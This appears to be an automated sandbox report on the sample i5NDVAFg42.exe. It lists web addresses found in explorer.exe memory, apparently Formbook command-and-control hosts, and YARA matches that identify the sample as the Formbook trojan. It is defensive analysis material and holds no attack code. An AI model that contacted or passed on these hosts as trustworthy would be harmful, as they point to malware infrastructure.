              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bharatcrimecontrol24news.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bharatcrimecontrol24news.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bharatcrimecontrol24news.com/vr01/www.kirtirefrigeration.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bharatcrimecontrol24news.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.familyofficesheet.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.familyofficesheet.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.familyofficesheet.com/vr01/www.mayorii.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.familyofficesheet.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flavorfog.online
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flavorfog.online/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flavorfog.online/vr01/www.bharatcrimecontrol24news.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flavorfog.onlineReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com/vr01/www.laneflowlogistics.com
              Source: explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com/wp-content/themes/business-identity-mvp/style.css?ver=6.4.3
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.helyibudapest.com
              Source: explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.helyibudapest.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.helyibudapest.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hsyxkj.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hsyxkj.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hsyxkj.com/vr01/www.makeyousurprise.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hsyxkj.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kirtirefrigeration.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kirtirefrigeration.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kirtirefrigeration.com/vr01/www.topdeals.biz
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kirtirefrigeration.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.com/vr01/www.familyofficesheet.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laneflowlogistics.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.com/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.com/vr01/www.helyibudapest.com
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.makeyousurprise.comReferer:
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mayorii.com

              E-Banking Fraud

              Source: Yara match, File source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara match, File source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: i5NDVAFg42.exe, type: SAMPLE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: i5NDVAFg42.exe, type: SAMPLE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: i5NDVAFg42.exe, type: SAMPLE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000002.00000002.4456590108.000000000E4EB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
